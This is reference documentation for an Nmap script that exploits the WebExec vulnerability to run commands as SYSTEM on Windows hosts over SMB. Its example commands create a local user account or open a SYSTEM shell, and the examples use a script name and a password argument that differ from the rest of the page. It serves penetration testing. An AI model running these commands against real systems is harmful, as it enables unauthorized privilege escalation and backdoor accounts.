
smb-webexec-exploit NSE Script

Description

Attempts to run a command via WebExService, using the WebExec vulnerability. Given a Windows account (local or domain), this will start an arbitrary executable with SYSTEM privileges over the SMB protocol.

The argument `webexec_command` will run the command directly. It may or may not start with a GUI. `webexec_gui_command` will always start with a GUI, and is useful for running commands such as "cmd.exe" as SYSTEM if you have access.

References:

* <https://www.webexec.org>
* <https://blog.skullsecurity.org/2018/technical-rundown-of-webexec>

### See also:

* [smb-vuln-webexec.nse](<../scripts/smb-vuln-webexec.html>)

## Script Arguments

#### webexec_gui_command

The command to run on the target with a GUI

#### webexec_command

The command to run on the target

#### randomseed, smbbasic, smbport, smbsign

See the documentation for the [smb](<../lib/smb.html#script-args>) library.

#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library.

## Example Usage

```
nmap --script smb-vuln-webexec --script-args 'smbusername=<username>,smbpass=<password>,webexec_command=net user test test /add' -p139,445 <host>
nmap --script smb-vuln-webexec --script-args 'smbusername=<username>,smbpass=<password>,webexec_gui_command=cmd' -p139,445 <host>
```

## Script Output

```
| smb-vuln-webexec:
|_ Vulnerable: WebExService could be accessed remotely as the given user!

| smb-vuln-webexec:
| Vulnerable: WebExService could be accessed remotely as the given user!
|_ ...and successfully started console command: net user test test /add
```

## Requires

* [msrpc](<../lib/msrpc.html>)
* [smb](<../lib/smb.html>)
* [stdnse](<../lib/stdnse.html>)
* string
* [shortport](<../lib/shortport.html>)
* [stringaux](<../lib/stringaux.html>)

